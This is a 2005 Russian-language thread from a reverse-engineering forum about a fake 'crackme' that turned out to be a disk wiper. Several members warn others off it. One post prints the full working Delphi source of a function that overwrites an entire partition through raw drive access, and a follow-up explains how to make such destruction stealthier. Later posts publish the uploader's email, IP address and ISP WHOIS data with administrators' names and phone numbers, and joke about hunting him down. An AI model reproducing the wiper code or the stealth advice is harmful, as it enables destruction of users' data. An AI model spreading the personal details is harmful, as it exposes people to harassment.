Сейчас на форуме: ManHunter, Magister Yoda, rtsgreg1989 (+10 невидимых)

 eXeL@B —› Основной форум —› Офигенный CRACKME для ностоящих кракеров (ПОДСТАВА)
. 1 . 2 . 3 . >>
Посл.ответ Сообщение

Ранг: 0.0 (гость)
Активность: 0=0
Статус: Участник

Создано: 19 мая 2005 09:53 · Поправил: Модератор
· Личное сообщение · #1

Этот крякми написан на дельфи и весит всего 15 килобайт, но вам его никогда не взломать, так как там настолько офигенная защита, что вы все рагьше повеситесь чем его взломаете.
Ну а если кто взломает, то это будет настоящий великий гуру кракинга!
Давайте зацените!!!

// DELETED by -= ALEX =-



Ранг: 495.3 (мудрец)
Активность: 0.30
Статус: Участник

Создано: 19 мая 2005 11:09 · Поправил: Bitfry
· Личное сообщение · #2

НЕ ЗАПУСКАЙТЕ ЭТУ ЗАРАЗУ, ОНА НАКРЫВАЕТ КАК МИНИМУМ ОС!
ЗЫ А этого урода надо, пожалуй, забанить.

-----
Всем привет, я вернулся





Ранг: 266.8 (наставник), 5thx
Активность: 0.220.03
Статус: Участник
very WELL :)

Создано: 19 мая 2005 11:34
· Личное сообщение · #3

Мыло его:
SadiST2004@yandex.ru




Ранг: 266.8 (наставник), 5thx
Активность: 0.220.03
Статус: Участник
very WELL :)

Создано: 19 мая 2005 11:36
· Личное сообщение · #4

IP 81.2.59.171




Ранг: 420.3 (мудрец)
Активность: 0.240
Статус: Участник

Создано: 19 мая 2005 12:23
· Личное сообщение · #5

f489_CrackMe.rar - модераторы, может убрать этот МУСОР. Мало ли чего...

-----
Сколько ни наталкивали на мысль – все равно сумел увернуться




Ранг: 495.3 (мудрец)
Активность: 0.30
Статус: Участник

Создано: 19 мая 2005 12:25
· Личное сообщение · #6

Вот ещё бы домашний адрес

0040374A |> 6A 00 /push 0 ; /pOverlapped = NULL
0040374C |. 8D45 F4 |lea eax, dword ptr ss:[ebp-C] ; |
0040374F |. 50 |push eax ; |pBytesWritten
00403750 |. 57 |push edi ; |nBytesToWrite
00403751 |. 8B45 F8 |mov eax, dword ptr ss:[ebp-8] ; |
00403754 |. 50 |push eax ; |Buffer = 00830038
00403755 |. 56 |push esi ; |hFile
00403756 |. E8 C9FEFFFF |call <jmp.&kernel32.WriteFile> ; \WriteFile
0040375B |. 4B |dec ebx
0040375C |.^75 EC \jnz short CrackMe.0040374A

В EBX на входе в цикл 00010F26 (69414d)
Что бы это могло значить?

Надо же быть такой редиской.

-----
Всем привет, я вернулся





Ранг: 120.6 (ветеран)
Активность: 0.090
Статус: Участник
rootkit developer

Создано: 19 мая 2005 13:06
· Личное сообщение · #7

Отдизасмил этот крякми, посмотрел, показалось весьма знакомым...
В исходнике этот кож выглядел так:
{

Затирание нахрен раздела на винте.
Drive - буква уничтожаемого диска.
Функция возвращает успешность выполнения своей черной работы.
За использование в незаконных целях
автор не отвечает (сидеть сами будете).
}
function DieHard(Drive: Char): boolean;
var
hFile: dword;
Buff: pointer;
Written: dword;
DiskSize: int64;
SectorsPerCluster,
BytesPerSector,
FreeClusters,
Clusters: dword;
BuffSize, r: dword;
begin
Result := false;
hFile := CreateFile(PChar('\\.\' + Drive +':'), GENERIC_WRITE,
FILE_SHARE_READ or FILE_SHARE_WRITE,
nil, OPEN_EXISTING, 0, 0);
if hFile = INVALID_HANDLE_VALUE then Exit;
GetDiskFreeSpace(PChar(Drive + ':\'), SectorsPerCluster,
BytesPerSector, FreeClusters, Clusters);
DiskSize := SectorsPerCluster * BytesPerSector * Clusters;
BuffSize := SectorsPerCluster * BytesPerSector * 10;
GetMem(Buff, BuffSize);
for r := 0 to DiskSize div BuffSize do
WriteFile(hFile, Buff^, BuffSize, Written, nil);
FreeMem(Buff);
CloseHandle(hFile);
Result := true;
end;


Этот код я выкладывал на форуме васма недели две назад...
Приношу всем пострадавшим свои глубокие соболезнования...

-----
Скажем дружно - нафиг нужно.




Ранг: 16.8 (новичок)
Активность: 0.030
Статус: Участник

Создано: 19 мая 2005 13:06
· Личное сообщение · #8

А вам ник ничего не напоминает?Я сам немного лажанулся. ;) Эта зараза убила fat раздел...



Ранг: 495.3 (мудрец)
Активность: 0.30
Статус: Участник

Создано: 19 мая 2005 13:32
· Личное сообщение · #9

Ms-Rem
Так надо бы drГолове отправить, как вирус и в drWeb послать.

-----
Всем привет, я вернулся





Ранг: 120.6 (ветеран)
Активность: 0.090
Статус: Участник
rootkit developer

Создано: 19 мая 2005 13:36
· Личное сообщение · #10

Еще раз приношу всем свои извинения...

-----
Скажем дружно - нафиг нужно.




Ранг: 495.3 (мудрец)
Активность: 0.30
Статус: Участник

Создано: 19 мая 2005 13:45
· Личное сообщение · #11

Ms-Rem пишет:
Еще раз приношу всем свои извинения...


Да ладно тебе извиняться, дырку то не ты создал .
Это как раз хорошо, потому что идея так глупо реализована... Хотя лучше не буду объяснять, как оно могло нанести мне вред .
ЗЫ Конечно, если на работе запустить такую хрень, мало не покажется.

-----
Всем привет, я вернулся





Ранг: 120.6 (ветеран)
Активность: 0.090
Статус: Участник
rootkit developer

Создано: 19 мая 2005 13:50
· Личное сообщение · #12

Да, уничтожение раздела весьма примитивное, если делать основательно, то нужно определять место жизненно важных областей раздела (FAT, MFT) и затирать в первую очередь их. Также это стоит делать замедленно, чтобы было незаметно. В это время прога должна выполнять что-нибудь отвлекающее. Или лучше запустить форматирующий поток в другом процессе. Тогда это будет полный пи#дец.
Если кто интересуется, то могу и такую хрень накатать.

-----
Скажем дружно - нафиг нужно.





Ранг: 420.3 (мудрец)
Активность: 0.240
Статус: Участник

Создано: 19 мая 2005 14:41
· Личное сообщение · #13

Ms-Rem пишет:
Да, уничтожение раздела весьма примитивное, если делать основательно, то нужно определять место жизненно важных областей раздела (FAT, MFT) и затирать в первую очередь их. Также это стоит делать замедленно, чтобы было незаметно. В это время прога должна выполнять что-нибудь отвлекающее. Или лучше запустить форматирующий поток в другом процессе. Тогда это будет полный пи#дец.
Если кто интересуется, то могу и такую хрень накатать.

Это что прикол, может еще расскажешь, как атомные бомбы собирать...
Исходники выложить, а это уже не исследование, а распространение вредоносных программ.
Такие вещи нужно, если и объяснять, то на пальцах, а не готовые программы выкладывать.

Модераторы, уберите аттач f489_CrackMe.rar, это г**но не должно дальше расходиться.

-----
Сколько ни наталкивали на мысль – все равно сумел увернуться




Ранг: 145.5 (ветеран)
Активность: 0.060
Статус: Участник

Создано: 19 мая 2005 15:20
· Личное сообщение · #14

Ms-Rem
Накатай!...Еще лучше - извлекаешь из архива(что бы отдизасмить напр.) и он автостартует




Ранг: 120.6 (ветеран)
Активность: 0.090
Статус: Участник
rootkit developer

Создано: 19 мая 2005 15:35
· Личное сообщение · #15

Фпесду, а то потом еще убьют на улице...

-----
Скажем дружно - нафиг нужно.




Ранг: 8.9 (гость)
Активность: 0.020
Статус: Участник

Создано: 19 мая 2005 16:50 · Поправил: geRC
· Личное сообщение · #16

Офигенный CRACKME для ностоящих кракеров.
достаточно посмотреть на название топика, чтобы понять что сообщение это писал какой-нибудь школьник =) такое лучше не запускать ;]




Ранг: 420.3 (мудрец)
Активность: 0.240
Статус: Участник

Создано: 19 мая 2005 17:40
· Личное сообщение · #17

// DELETED by -= ALEX =-[i]
Спасибо, вот это дело.

-----
Сколько ни наталкивали на мысль – все равно сумел увернуться




Ранг: 389.6 (мудрец)
Активность: 0.150
Статус: Участник

Создано: 19 мая 2005 18:12
· Личное сообщение · #18

Ух, епт!

-----
TBR




Ранг: 389.6 (мудрец)
Активность: 0.150
Статус: Участник

Создано: 19 мая 2005 18:15
· Личное сообщение · #19

Можно как нить сделать чтоб он пока на форум не заходил?

-----
TBR





Ранг: 115.8 (ветеран)
Активность: 0.080
Статус: Участник

Создано: 19 мая 2005 18:37
· Личное сообщение · #20

WELL пишет:
81.2.59.171

Адрес прова - Владивосток, Проезд Комарова 36, тел: +7 4232 406040, факс: +7 4232 406029
ПРОВ - POL-DIALUP-NET, POL Dialup Lines,
Осталось тока вычислить номер телефона, который был под сим IP 19 Мая 9:54 по Москве (17:54 по Владику, если не ошибаюсь). И мона ехать, МАЧИТЬ извращенца........

-----
Ни одно доброе дело не должно остаться безнаказанным !!!




Ранг: 389.6 (мудрец)
Активность: 0.150
Статус: Участник

Создано: 19 мая 2005 18:52
· Личное сообщение · #21

Ну что, кто нить из Владивастока есть?

inetnum: 81.2.56.0 - 81.2.63.255
netname: POL-DIALUP-NET
descr: POL Dialup Lines
country: RU
admin-c: KKU1-RIPE
tech-c: GAV2-RIPE
status: ASSIGNED PA
mnt-by: PRIMORYE-NCC-MNT
changed: gav@vmts.ru 20021227
source: RIPE

route: 81.2.32.0/19
descr: PRIMORYE NET
origin: AS12332
notify: noc@vmts.ru
mnt-by: PRIMORYE-NCC-MNT
changed: gav@vmts.ru 20030129
source: RIPE

person: Konstantin U Kaplin
address: VMTS
address: 36, pr. Komarova st.
address: 690950 Vladivostok, Russia
phone: +7 4232 406040
fax-no: +7 4232 406029
e-mail: kku@vmts.ru
mnt-by: PRIMORYE-NCC-MNT
nic-hdl: KKU1-RIPE
remarks: Network Administrator of VMTS
changed: gav@vmts.ru 19980916
changed: gav@vmts.ru 20011108
source: RIPE

person: Alexei V Golovin
address: 36, pr. Komarova st.
address: 690950 Vladivostok, Russia
phone: +7 4232 406040
fax-no: +7 4232 406029
e-mail: gav@prim.dsv.ru
mnt-by: PRIMORYE-NCC-MNT
nic-hdl: GAV2-RIPE
remarks: Network Administrator of PoL
changed: gav@vmts.ru 19980119
changed: gav@vmts.ru 20011108
changed: gav@vmts.ru 20030708
changed: gav@prim.dsv.ru 20031223
source: RIPE


Диал-апщик из Владивастока. Пользуется услугами провайдера PRIMORYE-NCC-MNT который находится по адресу 690950 Россия, г. Владивасток, пр. Комарова, 36. тел. +7 4232 406040, факс +7 4232 406029

Админы:
Константин Каплин kku@vmts.ru
Алексей Головин gav@prim.dsv.ru

-----
TBR




Ранг: 389.6 (мудрец)
Активность: 0.150
Статус: Участник

Создано: 19 мая 2005 18:54
· Личное сообщение · #22

[EXE]_cutor


-----
TBR





Ранг: 332.0 (мудрец)
Активность: 0.180
Статус: Участник
•Pr0tEcToRs KiLLeR•

Создано: 19 мая 2005 18:57
· Личное сообщение · #23

Grey пишет:
Ну что, кто нить из Владивастока есть?

дык вот Рем и есть откуда-то оттуда... из лога мирка:
* Quits: Ms-Rem (_Rem_@Street-AFA91BD2.dialup.primorye.ru) (Ping timeout)





Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 19 мая 2005 19:08
· Личное сообщение · #24

Mario555 пишет:
дык вот Рем и есть откуда-то оттуда... из лога мирка:

Угу, еще некто Korvin, BC и mcdemon оттудова-же



Ранг: 389.6 (мудрец)
Активность: 0.150
Статус: Участник

Создано: 19 мая 2005 19:24
· Личное сообщение · #25

Mario555 пишет:
(_Rem_@Street-AFA91BD2.dialup.primorye.ru


domain: PRIMORYE.RU
type: PUBLIC
nserver: ns.vmts.ru.
nserver: ns2.vmts.ru.
state: REGISTERED, DELEGATED
org: Primorsky region Brancn Joint Stock Company "Dalsvyaz"
phone: +7 4232 267405
fax-no: +7 4232 406029
e-mail: noc@primorye.ru
e-mail: igg@prim.dsv.ru
registrar: RUCENTER-REG-RIPN
created: 1997.10.22
paid-till: 2005.12.01
source: TC-RIPN

Ara пишет:
еще некто Korvin, BC и mcdemon оттудова-же

А о них что есть?

-----
TBR





Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 19 мая 2005 19:28
· Личное сообщение · #26

Grey пишет:
А о них что есть?

Хм, зайди на канал, кто-нить логи кинет. У меня не сохраняются логи.




Ранг: 115.8 (ветеран)
Активность: 0.080
Статус: Участник

Создано: 19 мая 2005 19:29
· Личное сообщение · #27

Grey
ГЫ, лог похож на XSpider'овский. Я его юзал
Ara пишет:
Угу, еще некто Korvin, BC и mcdemon оттудова-же

УСЁ, писец мазахисту. Одним програмером на земле сёдня меньше стало
PS ещё над мылом мона поиздеваться.............

-----
Ни одно доброе дело не должно остаться безнаказанным !!!




Ранг: 16.8 (новичок)
Активность: 0.030
Статус: Участник

Создано: 19 мая 2005 19:34
· Личное сообщение · #28

У меня на фатовском разделе была одна единственная прога(не считая части моего диплома,)которой очень жалко -IDA 4.7 под Линукс.Качал с soft.0zones.com/. Сейчас этот сайт в даунах,неможет кто дать ссылку откуда ее можно скачать?Спасибо.




Ранг: 115.8 (ветеран)
Активность: 0.080
Статус: Участник

Создано: 19 мая 2005 19:55
· Личное сообщение · #29

4.8 недавно test кусками по 3 метра выкладывал. Ищи........

-----
Ни одно доброе дело не должно остаться безнаказанным !!!





Ранг: 260.3 (наставник), 2thx
Активность: 0.120
Статус: Участник
PPC-PROTECT author

Создано: 19 мая 2005 19:59
· Личное сообщение · #30

а что, всякие антивирусники такие приколы не пропаливают? сам-то не запускал файло.. просто интересно.

-----
Пиво, сиськи, транс



. 1 . 2 . 3 . >>
 eXeL@B —› Основной форум —› Офигенный CRACKME для ностоящих кракеров (ПОДСТАВА)
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати